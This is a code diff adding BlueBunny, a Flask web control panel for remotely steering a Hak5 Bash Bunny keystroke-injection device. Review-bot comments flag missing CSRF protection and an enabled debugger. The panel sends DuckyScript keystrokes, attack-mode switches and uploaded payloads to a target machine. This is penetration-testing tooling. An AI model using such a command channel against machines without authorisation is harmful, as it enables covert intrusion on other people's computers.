@ -0,0 +1,61 @@
|
|||
from flask import Flask, request, render_template, jsonify
|
||||
import urllib.parse
|
||||
import threading
|
||||
import BunnyLE
|
||||
|
||||
app = Flask(__name__)
|
||||
|
||||
bb = None
|
||||
connection = 0
|
||||
con_fail_count = 0
|
||||
|
||||
def connect_bunny():
|
||||
global bb
|
||||
global connection
|
||||
global con_fail_count
|
||||
|
||||
BunnyLE.init()
|
||||
current_try = BunnyLE.connect()
|
||||
|
||||
if not current_try == False:
|
||||
bb = current_try
|
||||
connection = 1
|
||||
else:
|
||||
con_fail_count += 1
|
||||
connection = 2
|
||||
|
||||
@app.route("/", methods=['GET', 'POST'])
|
||||
def index():
|
||||
if request.method == 'POST':
|
||||
global bb
|
||||
query = request.form.get('query')
|
||||
mode = request.form.get('mode')
|
||||
|
||||
BunnyLE.send(bb, query, mode)
|
||||
|
||||
return render_template("index.html")
|
||||
|
||||
@app.route("/connect", methods=['GET'])
|
||||
def connect():
|
||||
connect_thread = threading.Thread(target=connect_bunny)
|
||||
connect_thread.start()
|
||||
|
||||
return render_template("connecting.html")
|
||||
|
||||
@app.route("/con-check", methods=['GET'])
|
||||
def connectCheck():
|
||||
global con_fail_count
|
||||
|
||||
if connection == 0:
|
||||
return jsonify(connected=0)
|
||||
elif connection == 1:
|
||||
return jsonify(connected=1)
|
||||
elif connection == 2:
|
||||
if con_fail_count < 5:
|
||||
connect_bunny()
|
||||
return jsonify(connected=0)
|
||||
else:
|
||||
return jsonify(connected=2)
|
||||
|
||||
if __name__ == '__main__':
|
||||
app.run(host="localhost", port=1472, debug=True)
|
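Review bot: `index()` accepts a plain form POST with `query` and `mode` and forwards it straight to `BunnyLE.send`, with no CSRF token and no Origin check, so any site open in the operator's browser can submit a cross-site form to `http://localhost:1472/` and have DuckyScript typed on the target; binding to localhost does not prevent that. Add a per-session CSRF token, or require a custom header and reject form-encoded bodies. `app.run(..., debug=True)` turns on the Werkzeug debugger, which exposes an interactive Python console on unhandled errors; keep it off outside development. Also, `bb` is `None` until a connection succeeds and a POST in that state crashes inside `BunnyLE.send`, and `connectCheck` calls `connect_bunny()` synchronously on the request thread while a `/connect` thread may still be running, racing on the `connection` and `bb` globals.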
|
@ -0,0 +1,163 @@
|
|||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<link rel="SHORTCUT ICON" type="image/x-icon" href="static/bb_icon.png"/>
|
||||
<link rel="icon" type="image/x-icon" href="static/bb_icon.png" />
|
||||
<meta charset="utf-8">
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1">
|
||||
<title>BlueBunny</title>
|
||||
<meta name="description" content="Remote control your Bash Bunny MKII">
|
||||
<link href="static/bootstrap.min.css" rel="stylesheet">
|
||||
<style type="text/css">
|
||||
.btn-imp {
|
||||
--bs-btn-color: #EC1A24 !important;
|
||||
--bs-btn-border-color: #EC1A24 !important;
|
||||
--bs-btn-hover-border-color: #1a62ec !important;
|
||||
--bs-btn-hover-bg: #1a62ec !important;
|
||||
--bs-btn-hover-color: #ffffff !important;
|
||||
}
|
||||
|
||||
@keyframes spinner {
|
||||
0% {transform: rotate( 0deg ) scale( 1 );}
|
||||
100% {transform: rotate( 360deg ) scale( 1 );}
|
||||
};
|
||||
</style>
|
||||
<script type="text/javascript">
|
||||
let fail_counter = 0
|
||||
|
||||
function tryAgain() {
|
||||
document.getElementById("action").innerHTML = '<h3 class="text-center" style="color: #ced4da; margin-bottom: 10px;">Connecting your Bash Bunny...</h3><div class="text-center" style="margin-top: 100px;"><a class="btn btn-imp" title="Connect" href="/connect" id="connectBtn">Too many fails occured... Try again</a><br><br><p class="fw-bold">OR</p></div><ul style="margin-bottom: 100px;"><li>Make sure your bluetooth adapter is running properly</li><li>Restart your Bash Bunny via unplugging and plugging it back in</li><li>Restart the BlueBunny C2 server\'s operating system</li></ul><p>Please be patient - Making BLE connections can be buggy. It\'s likely a temporary problem that will be gone in a minute.</p>'
|
||||
}
|
||||
|
||||
function connectionCheck() {
|
||||
fetch("/con-check").then(function(response) {
|
||||
return response.json();
|
||||
}).then(function(data) {
|
||||
if (data.connected == 1) {
|
||||
window.location.replace("/");
|
||||
} else if (data.connected == 2) {
|
||||
tryAgain();
|
||||
}
|
||||
})
|
||||
}
|
||||
|
||||
setInterval(connectionCheck, 5000);
|
||||
</script>
|
||||
</head>
|
||||
<body style="background-color: #202124; color: #adb5bd; height: 100%; overflow: hidden">
|
||||
<div style="filter: blur(2.5px); position: absolute; width: 100%; height: 100%;">
|
||||
<nav class="navbar navbar-expand navbar-light fixed-top shadow-sm" style="border-bottom: solid; border-color: #1a62ec; border-width: 2.5px; background: #202124;">
|
||||
<div class="container-fluid">
|
||||
<a class="navbar-brand">
|
||||
<img src="static/logo.png" style="height: 45px; padding-right: 15px; filter: brightness(0) saturate(100%) invert(23%) sepia(75%) saturate(3313%) hue-rotate(217deg) brightness(99%) contrast(86%);" class="d-inline-block">
|
||||
</a>
|
||||
<button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarToggler" aria-controls="navbarToggler" aria-expanded="false" aria-label="Toggle navigation">
|
||||
<span class="navbar-toggler-icon"></span>
|
||||
</button>
|
||||
<div class="collapse navbar-collapse" id="navbarToggler">
|
||||
<ul class="nav ms-auto">
|
||||
<li class="nav-item">
|
||||
<button class="btn" title="Connect" disabled>Connect to Bash Bunny</button>
|
||||
</li>
|
||||
<li class="nav-item" style="margin: auto; margin-right: 15px; margin-left: 20px;">
|
||||
<a>©</a>
|
||||
</li>
|
||||
</ul>
|
||||
</div>
|
||||
</div>
|
||||
</nav>
|
||||
<nav class="navbar navbar-expand-lg navbar-light" style="visibility: hidden;">
|
||||
<div class="container-fluid">
|
||||
<a class="navbar-brand" href="#">
|
||||
<img src="static/bb_icon.png" style="height: 45px; padding-right: 15px;" class="d-inline-block"><span style="vertical-align: middle;">BlueBunny</span>
|
||||
</a>
|
||||
<button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarToggler" aria-controls="navbarToggler" aria-expanded="false" aria-label="Toggle navigation">
|
||||
<span class="navbar-toggler-icon"></span>
|
||||
</button>
|
||||
<div class="collapse navbar-collapse">
|
||||
<ul class="nav">
|
||||
<li class="nav-item">
|
||||
<a class="btn">Connect to Bash Bunny</a>
|
||||
</li>
|
||||
<li class="nav-item" style="margin: auto; margin-right: 15px; margin-left: 20px;">
|
||||
<a>©</a>
|
||||
</li>
|
||||
</ul>
|
||||
<ul class="nav ms-auto">
|
||||
<li class="nav-item">
|
||||
<a class="nav-link">©</a>
|
||||
</li>
|
||||
</ul>
|
||||
</div>
|
||||
</div>
|
||||
</nav>
|
||||
<br>
|
||||
<br>
|
||||
<div class="container" style="display: flex; flex-flow: wrap; justify-content: start;">
|
||||
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
|
||||
<h4 style="color: #ced4da;">Payload One-Liner <p class="text-dark-emphasis" style="font-size: 15px;"><small>Run a single line of code</small></p></h4>
|
||||
<div class="input-group mb-3">
|
||||
<input type="text" class="form-control" placeholder="Q ALT F4" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;">
|
||||
<button class="btn">Run</button>
|
||||
</div>
|
||||
</div>
|
||||
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
|
||||
<h4 style="color: #ced4da;">Payload Script <p class="text-dark-emphasis" style="font-size: 15px;"><small>Upload and execute a payload file</small></p></h4>
|
||||
<div class="input-group mb-3">
|
||||
<input type="file" class="form-control" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;">
|
||||
</div>
|
||||
<button class="btn">Execute Payload</button>
|
||||
</div>
|
||||
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
|
||||
<h4 style="color: #ced4da;">Attack Mode <p class="text-dark-emphasis" style="font-size: 15px;"><small>Configure Ethernet, Storage, HID and Serial</small></p></h4>
|
||||
<div class="input-group">
|
||||
<select class="form-select" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;">
|
||||
<option selected>None</option>
|
||||
</select>
|
||||
<button class="btn">Update</button>
|
||||
</div>
|
||||
</div>
|
||||
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
|
||||
<h4 style="color: #ced4da;">LED <p class="text-dark-emphasis" style="font-size: 15px;"><small>Light up your Bush Bunny</small></p></h4>
|
||||
<div class="input-group">
|
||||
<select class="form-select" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;" name="query">
|
||||
<option selected>Green</option>
|
||||
</select>
|
||||
<button class="btn">Update</button>
|
||||
</div>
|
||||
</div>
|
||||
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
|
||||
<h4 style="color: #ced4da;">CPU <p class="text-dark-emphasis" style="font-size: 15px;"><small>Tune the CPU to your needs</small></p></h4>
|
||||
<div class="input-group">
|
||||
<select class="form-select" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;">
|
||||
<option selected>Quad Core Ondemand (Default)</option>
|
||||
</select>
|
||||
<button class="btn">Update</button>
|
||||
</div>
|
||||
</div>
|
||||
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
|
||||
<h4 style="color: #ced4da;">Power <p class="text-dark-emphasis" style="font-size: 15px;"><small>Take a break</small></p></h4>
|
||||
<div class="input-group">
|
||||
<select class="form-select" style="background-color: #202124; border-color: #EC1A24; color: #adb5bd;">
|
||||
<option selected>Shutdown</option>
|
||||
</select>
|
||||
<button class="btn btn-imp">Initialize</button>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
<div style="position: absolute; width: 100%; height: 100%;">
|
||||
<div style="display: flex; justify-content: center; align-items: center; margin-top: 25px;">
|
||||
<div class="rounded shadow" style="border: solid; border-color: #1a62ec; border-width: 1px; background: #202124; max-width: 600px; height: fit-content; margin-left: 15px; margin-right: 15px; display: flex; justify-content: center;">
|
||||
<div style="margin: 20px; width: 100%" id="action">
|
||||
<h3 class="text-center" style="color: #ced4da; margin-bottom: 10px;">Connecting your Bash Bunny...</h3>
|
||||
<div class="text-center" style="margin-top: 100px; margin-bottom: 100px;">
|
||||
<img src="static/bb_icon.png" style="height: 5rem; width: 5rem; animation-name: spinner; animation-duration: 1s; animation-delay: 1s; animation-iteration-count: infinite;">
|
||||
</div>
|
||||
<p>This can take some time. Make sure your Bash Bunny is nearby and the BlueBunny payload is running successfully (Green LED).</p>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</body>
|
||||
</html>
|
|
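Review bot: this page reproduces the entire control panel from index.html (navbar and all six cards) as disabled markup purely to serve as the blurred backdrop, so every change to the panel has to be made twice; render the cards from a shared Jinja include instead. "Light up your Bush Bunny" in the LED card should read "Bash Bunny". The `connectionCheck` poll redirects to `/` on `connected == 1` but keeps running every 5 s after `tryAgain()` has replaced the content; clear the interval once the failure state is shown.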
@ -0,0 +1,337 @@
|
|||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<link rel="SHORTCUT ICON" type="image/x-icon" href="static/bb_icon.png"/>
|
||||
<link rel="icon" type="image/x-icon" href="static/bb_icon.png" />
|
||||
<meta charset="utf-8">
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1">
|
||||
<title>BlueBunny</title>
|
||||
<meta name="description" content="Remote control your Bash Bunny MKII">
|
||||
<link href="static/bootstrap.min.css" rel="stylesheet">
|
||||
<style type="text/css">
|
||||
.btn-imp {
|
||||
--bs-btn-color: #EC1A24 !important;
|
||||
--bs-btn-border-color: #EC1A24 !important;
|
||||
--bs-btn-hover-border-color: #1a62ec !important;
|
||||
--bs-btn-hover-bg: #1a62ec !important;
|
||||
--bs-btn-hover-color: #ffffff !important;
|
||||
}
|
||||
|
||||
.btn {
|
||||
--bs-btn-color: #1a62ec;
|
||||
--bs-btn-border-color: #1a62ec;
|
||||
--bs-btn-hover-border-color: #1a62ec;
|
||||
--bs-btn-hover-bg: #1a62ec;
|
||||
--bs-btn-hover-color: #ffffff;
|
||||
}
|
||||
|
||||
code {
|
||||
color: #1a62ec;
|
||||
}
|
||||
|
||||
.form-control::placeholder {
|
||||
color: #adb5bd;
|
||||
opacity: 0.5;
|
||||
}
|
||||
</style>
|
||||
<script type="text/javascript">
|
||||
function disableControl() {
|
||||
forms = document.getElementsByClassName('form');
|
||||
|
||||
for (i = 0; i < forms.length; i++) {
|
||||
forms[i].getElementsByTagName('form')[0].hidden = true;
|
||||
forms[i].getElementsByTagName('h6')[0].hidden = false;
|
||||
}
|
||||
}
|
||||
|
||||
function enableControl() {
|
||||
forms = document.getElementsByClassName('form');
|
||||
|
||||
for (i = 0; i < forms.length; i++) {
|
||||
forms[i].getElementsByTagName('h6')[0].hidden = true;
|
||||
forms[i].getElementsByTagName('form')[0].hidden = false;
|
||||
}
|
||||
}
|
||||
|
||||
function connectionCheck() {
|
||||
fetch("/con-check").then(function(response) {
|
||||
return response.json();
|
||||
}).then(function(data) {
|
||||
if (data.connected == 0 || data.connected == 2) {
|
||||
document.getElementById("connectBtn").hidden = false;
|
||||
disableControl();
|
||||
} else if (data.connected == 1) {
|
||||
document.getElementById("connectBtn").hidden = true;
|
||||
enableControl();
|
||||
}
|
||||
})
|
||||
}
|
||||
|
||||
function info(topic) {
|
||||
window.scrollTo(0, 0);
|
||||
|
||||
document.getElementsByTagName("BODY")[0].style["overflow"] = "hidden";
|
||||
|
||||
document.getElementById("page").style["filter"] = "blur(2.5px)";
|
||||
document.getElementById("page").style["position"] = "absolute";
|
||||
document.getElementById("page").style["width"] = "100%";
|
||||
document.getElementById("page").style["height"] = "100%";
|
||||
|
||||
document.getElementById(topic).hidden = false;
|
||||
}
|
||||
|
||||
function infoClose(topic) {
|
||||
document.getElementsByTagName("BODY")[0].style["overflow"] = null;
|
||||
|
||||
document.getElementById("page").style["filter"] = null;
|
||||
document.getElementById("page").style["position"] = null;
|
||||
document.getElementById("page").style["width"] = null;
|
||||
document.getElementById("page").style["height"] = null;
|
||||
|
||||
document.getElementById(topic).hidden = true;
|
||||
}
|
||||
|
||||
function execPayloadFile() {
|
||||
const reader = new FileReader();
|
||||
|
||||
reader.readAsText(document.getElementById("payloadFile").files[0]);
|
||||
|
||||
reader.onloadend = () => {
|
||||
query = reader.result;
|
||||
document.getElementById("payloadContent").value = query;
|
||||
|
||||
document.getElementById("payloadForm").submit();
|
||||
};
|
||||
}
|
||||
|
||||
connectionCheck()
|
||||
setInterval(connectionCheck, 10000);
|
||||
</script>
|
||||
</head>
|
||||
<body style="background-color: #202124; color: #adb5bd; height: 100%">
|
||||
<div id="page">
|
||||
<div>
|
||||
<nav class="navbar navbar-expand navbar-light fixed-top shadow-sm" style="border-bottom: solid; border-color: #1a62ec; border-width: 2px; background: #202124;">
|
||||
<div class="container-fluid">
|
||||
<a class="navbar-brand">
|
||||
<img src="static/logo.png" onclick="info('info_cp')" style="cursor: pointer; height: 45px; padding-right: 15px; padding-bottom: 5px; filter: brightness(0) saturate(100%) invert(23%) sepia(75%) saturate(3313%) hue-rotate(217deg) brightness(99%) contrast(86%);" class="d-inline-block">
|
||||
</a>
|
||||
<button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarToggler" aria-controls="navbarToggler" aria-expanded="false" aria-label="Toggle navigation">
|
||||
<span class="navbar-toggler-icon"></span>
|
||||
</button>
|
||||
<div class="collapse navbar-collapse" id="navbarToggler">
|
||||
<ul class="nav ms-auto">
|
||||
<li class="nav-item">
|
||||
<a class="btn btn-imp" title="Connect" href="/connect" id="connectBtn" hidden>Connect to Bash Bunny</a>
|
||||
</li>
|
||||
<li class="nav-item" style="margin: auto; margin-right: 15px; margin-left: 20px;">
|
||||
<a style="cursor: pointer; font-size: 1.25rem;" title="Copyright & Attribution" onclick="info('info_cp')">©</a>
|
||||
</li>
|
||||
</ul>
|
||||
</div>
|
||||
</div>
|
||||
</nav>
|
||||
<nav class="navbar navbar-expand-lg navbar-light" style="visibility: hidden;">
|
||||
<div class="container-fluid">
|
||||
<a class="navbar-brand" href="#">
|
||||
<img src="static/bb_icon.png" style="height: 45px; padding-right: 15px;" class="d-inline-block"><span style="vertical-align: middle;">BlueBunny</span>
|
||||
</a>
|
||||
<button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarToggler" aria-controls="navbarToggler" aria-expanded="false" aria-label="Toggle navigation">
|
||||
<span class="navbar-toggler-icon"></span>
|
||||
</button>
|
||||
<div class="collapse navbar-collapse">
|
||||
<ul class="nav">
|
||||
<li class="nav-item">
|
||||
<a class="btn">Connect to Bash Bunny</a>
|
||||
</li>
|
||||
<li class="nav-item" style="margin: auto; margin-right: 15px; margin-left: 20px;">
|
||||
<a>©</a>
|
||||
</li>
|
||||
</ul>
|
||||
</div>
|
||||
</div>
|
||||
</nav>
|
||||
</div>
|
||||
<br>
|
||||
<br>
|
||||
<div class="container" style="display: flex; flex-flow: wrap; justify-content: start;">
|
||||
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
|
||||
<h4 style="color: #ced4da;">Payload One-Liner <p class="text-dark-emphasis" style="font-size: 15px;"><small>Run a single line of code</small></p></h4>
|
||||
<div class="form">
|
||||
<form action="" method="POST" hidden>
|
||||
<div class="input-group mb-3">
|
||||
<input type="text" class="form-control" placeholder="Q ALT F4" autocomplete="off" list="datalistOptions" name="query" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;">
|
||||
<datalist id="datalistOptions">
|
||||
<option value="Q STRING Hello World!"></option>
|
||||
<option value="Q CAPSLOCK"></option>
|
||||
<option value="Q ALT F4"></option>
|
||||
<option value="Q COMMAND q"></option>
|
||||
<option value="Q WIN r"></option>
|
||||
<option value="Q COMMAND SPACE"></option>
|
||||
</datalist>
|
||||
<input type="hidden" name="mode" value="cmd">
|
||||
<button class="btn" type="submit">Run</button>
|
||||
</div>
|
||||
</form>
|
||||
<h6 hidden>Not available</h6>
|
||||
</div>
|
||||
</div>
|
||||
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
|
||||
<h4 style="color: #ced4da;">Payload Script<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-info-circle-fill" viewBox="-5 5 19 19" style="overflow: visible; cursor: pointer;" onclick="info('info_payload')"><path d="M8 15A7 7 0 1 1 8 1a7 7 0 0 1 0 14zm0 1A8 8 0 1 0 8 0a8 8 0 0 0 0 16z"/><path d="m8.93 6.588-2.29.287-.082.38.45.083c.294.07.352.176.288.469l-.738 3.468c-.194.897.105 1.319.808 1.319.545 0 1.178-.252 1.465-.598l.088-.416c-.2.176-.492.246-.686.246-.275 0-.375-.193-.304-.533L8.93 6.588zM9 4.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0z"/></svg> <p class="text-dark-emphasis" style="font-size: 15px;"><small>Upload and execute a payload file</small></p></h4>
|
||||
<div class="form">
|
||||
<form hidden>
|
||||
<div class="input-group mb-3">
|
||||
<input type="file" accept=".txt" class="form-control" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;" id="payloadFile">
|
||||
</div>
|
||||
<button class="btn" title="Execute Payload" onclick="execPayloadFile()">Execute Payload</button>
|
||||
</form>
|
||||
<form action="" method="POST" id="payloadForm">
|
||||
<input type="hidden" name="mode" value="cmd">
|
||||
<input type="hidden" name="query" value="" id="payloadContent">
|
||||
</form>
|
||||
<h6 hidden>Not available</h6>
|
||||
</div>
|
||||
</div>
|
||||
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
|
||||
<h4 style="color: #ced4da;">Attack Mode<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-info-circle-fill" viewBox="-5 5 19 19" style="overflow: visible; cursor: pointer;" onclick="info('info_attackmode')"><path d="M8 15A7 7 0 1 1 8 1a7 7 0 0 1 0 14zm0 1A8 8 0 1 0 8 0a8 8 0 0 0 0 16z"/><path d="m8.93 6.588-2.29.287-.082.38.45.083c.294.07.352.176.288.469l-.738 3.468c-.194.897.105 1.319.808 1.319.545 0 1.178-.252 1.465-.598l.088-.416c-.2.176-.492.246-.686.246-.275 0-.375-.193-.304-.533L8.93 6.588zM9 4.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0z"/></svg> <p class="text-dark-emphasis" style="font-size: 15px;"><small>Configure Ethernet, Storage, HID and Serial</small></p></h4>
|
||||
<div class="form">
|
||||
<form action="" method="POST" hidden>
|
||||
<div class="input-group">
|
||||
<select class="form-select" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;" name="query">
|
||||
<option value="ATTACKMODE OFF" selected>None</option>
|
||||
<option value="ATTACKMODE SERIAL">SERIAL</option>
|
||||
<option value="ATTACKMODE ECM_ETHERNET">ECM ETHERNET</option>
|
||||
<option value="ATTACKMODE RNDIS_ETHERNET">RNDIS ETHERNET</option>
|
||||
<option value="ATTACKMODE AUTO_ETHERNET">AUTO ETHERNET</option>
|
||||
<option value="ATTACKMODE STORAGE">STORAGE</option>
|
||||
<option value="ATTACKMODE HID">HID</option>
|
||||
</select>
|
||||
<input type="hidden" name="mode" value="cmd">
|
||||
<button class="btn" type="submit">Update</button>
|
||||
</div>
|
||||
</form>
|
||||
<h6 hidden>Not available</h6>
|
||||
</div>
|
||||
</div>
|
||||
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
|
||||
<h4 style="color: #ced4da;">LED <p class="text-dark-emphasis" style="font-size: 15px;"><small>Light up your Bush Bunny</small></p></h4>
|
||||
<div class="form">
|
||||
<form action="" method="POST" hidden>
|
||||
<div class="input-group">
|
||||
<select class="form-select" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;" name="query">
|
||||
<option value="LED G" selected>Green</option>
|
||||
<option value="LED B">Blue</option>
|
||||
<option value="LED R">Red</option>
|
||||
<option value="LED Y">Yellow</option>
|
||||
<option value="LED C">Cyan</option>
|
||||
<option value="LED M">Magenta</option>
|
||||
<option value="LED W">White</option>
|
||||
</select>
|
||||
<input type="hidden" name="mode" value="cmd">
|
||||
<button class="btn" type="submit">Update</button>
|
||||
</div>
|
||||
</form>
|
||||
<h6 hidden>Not available</h6>
|
||||
</div>
|
||||
</div>
|
||||
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
|
||||
<h4 style="color: #ced4da;">CPU Control <p class="text-dark-emphasis" style="font-size: 15px;"><small>Tune the CPU to your needs</small></p></h4>
|
||||
<div class="form">
|
||||
<form action="" method="POST" hidden>
|
||||
<div class="input-group">
|
||||
<select class="form-select" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;" name="query">
|
||||
<option value="CUCUMBER ENABLE">Single Core Ondemand (Low Power)</option>
|
||||
<option value="CUCUMBER DISABLE" selected>Quad Core Ondemand (Default)</option>
|
||||
<option value="CUCUMBER PLAID">Quad Core Performance (High Performance)</option>
|
||||
</select>
|
||||
<input type="hidden" name="mode" value="cmd">
|
||||
<button class="btn" type="submit">Update</button>
|
||||
</div>
|
||||
</form>
|
||||
<h6 hidden>Not available</h6>
|
||||
</div>
|
||||
</div>
|
||||
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
|
||||
<h4 style="color: #ced4da;">Power Management<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-info-circle-fill" viewBox="-5 5 19 19" style="overflow: visible; cursor: pointer;" onclick="info('info_power')"><path d="M8 15A7 7 0 1 1 8 1a7 7 0 0 1 0 14zm0 1A8 8 0 1 0 8 0a8 8 0 0 0 0 16z"/><path d="m8.93 6.588-2.29.287-.082.38.45.083c.294.07.352.176.288.469l-.738 3.468c-.194.897.105 1.319.808 1.319.545 0 1.178-.252 1.465-.598l.088-.416c-.2.176-.492.246-.686.246-.275 0-.375-.193-.304-.533L8.93 6.588zM9 4.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0z"/></svg> <p class="text-dark-emphasis" style="font-size: 15px;"><small>Take a break</small></p></h4>
|
||||
<div class="form">
|
||||
<form action="" method="POST" hidden>
|
||||
<div class="input-group">
|
||||
<select class="form-select" style="background-color: #202124; border-color: #EC1A24; color: #adb5bd;" name="query">
|
||||
<option value="shutdown -h now" selected>Shutdown</option>
|
||||
<option value="reboot">Reboot</option>
|
||||
</select>
|
||||
<input type="hidden" name="mode" value="cmd">
|
||||
<button class="btn btn-imp" type="submit">Initialize</button>
|
||||
</div>
|
||||
</form>
|
||||
<h6 hidden>Not available</h6>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
<div style="position: absolute; width: 100%; height: 100%;" id="info_payload" hidden>
|
||||
<div style="display: flex; justify-content: center; align-items: center; margin-top: 25px;">
|
||||
<div class="rounded shadow" style="border: solid; border-color: #1a62ec; border-width: 1px; background: #202124; max-width: 600px; height: fit-content; margin-left: 15px; margin-right: 15px; display: flex; justify-content: center;">
|
||||
<div style="margin: 20px; width: 100%" id="action">
|
||||
<h3 class="text-center" style="color: #ced4da; margin-bottom: 10px;">Payload Script</h3>
|
||||
<p>This section allows you to execute custom payload files.</p>
|
||||
<p>The name of the uploaded file doesn't have to match <code>payload.txt</code>.</p>
|
||||
<p>Uploaded payloads will be sent to your Bash Bunny and will be saved temporary. After finishing your payload, it gets removed automatically.
|
||||
<div class="text-center" style="margin-top: 100px;">
|
||||
<button class="btn" onclick="infoClose('info_payload')">Close</button>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
<div style="position: absolute; width: 100%; height: 100%;" id="info_attackmode" hidden>
|
||||
<div style="display: flex; justify-content: center; align-items: center; margin-top: 25px;">
|
||||
<div class="rounded shadow" style="border: solid; border-color: #1a62ec; border-width: 1px; background: #202124; max-width: 600px; height: fit-content; margin-left: 15px; margin-right: 15px; display: flex; justify-content: center;">
|
||||
<div style="margin: 20px; width: 100%" id="action">
|
||||
<h3 class="text-center" style="color: #ced4da; margin-bottom: 10px;">Attack Mode</h3>
|
||||
<p>This section allows you to change the Bash Bunny's attack mode like the <code>ATTACKMODE</code> payload command does.</p>
|
||||
<p>Further and more complex attack mode combinations can always be set from the "Payload One-Liner" or a payload file.</p>
|
||||
<p class="fw-bold">Important:</p>
|
||||
<p>When setting the attack mode, you likely can't change it without a reboot (besides disabling it again). The target machine may not recognize the change, for example, from STORAGE to HID. It may no longer detect the storage but won't be able to recognize the HID. Keep in mind: This can differ between target devices.</p>
|
||||
<div class="text-center" style="margin-top: 100px;">
|
||||
<button class="btn" onclick="infoClose('info_attackmode')">Close</button>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
<div style="position: absolute; width: 100%; height: 100%;" id="info_power" hidden>
|
||||
<div style="display: flex; justify-content: center; align-items: center; margin-top: 25px;">
|
||||
<div class="rounded shadow" style="border: solid; border-color: #1a62ec; border-width: 1px; background: #202124; max-width: 600px; height: fit-content; margin-left: 15px; margin-right: 15px; display: flex; justify-content: center;">
|
||||
<div style="margin: 20px; width: 100%" id="action">
|
||||
<h3 class="text-center" style="color: #ced4da; margin-bottom: 10px;">Power Management</h3>
|
||||
<p>This section allows you to shutdown or reboot your Bash Bunny.</p>
|
||||
<p>After reboot, your Bash Bunny will run the payload available at the current switch position.</p>
|
||||
<p>Rebooting may help when you encouter execution issues. When the attacked device won't recognize attack mode changes, rebooting and then setting the new attack mode will fix it.</p>
|
||||
<div class="text-center" style="margin-top: 100px;">
|
||||
<button class="btn" onclick="infoClose('info_power')">Close</button>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
<div style="position: absolute; width: 100%; height: 100%;" id="info_cp" hidden>
|
||||
<div style="display: flex; justify-content: center; align-items: center; margin-top: 25px;">
|
||||
<div class="rounded shadow" style="border: solid; border-color: #1a62ec; border-width: 1px; background: #202124; max-width: 600px; height: fit-content; margin-left: 15px; margin-right: 15px; display: flex; justify-content: center;">
|
||||
<div style="margin: 20px; width: 100%" id="action">
|
||||
<h3 class="text-center" style="color: #ced4da; margin-bottom: 10px;">Copyright & Attribution</h3>
|
||||
<br>
|
||||
<img src="static/logo.png" style="height: 45px; padding-right: 15px; padding-bottom: 5px;" class="d-inline-block">
|
||||
<p>BlueBunny is an open source project from <code><a href="https://github.com/90N45-d3v">90N45</a></code>.<br>It is licensed under the MIT license and should be treated as such.</p>
|
||||
<br>
|
||||
<img src="static/bb_icon_original.png" style="height: 45px; padding-right: 15px; padding-bottom: 5px;" class="d-inline-block">
|
||||
<p>Bash Bunny is a trademark of Hak5 LLC.<br>Visit <code><a href="https://hak5.org">hak5.org</a></code> for more.</p>
|
||||
<div class="text-center" style="margin-top: 100px;">
|
||||
<button class="btn" onclick="infoClose('info_cp')">Close</button>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</body>
|
||||
</html>
|
|
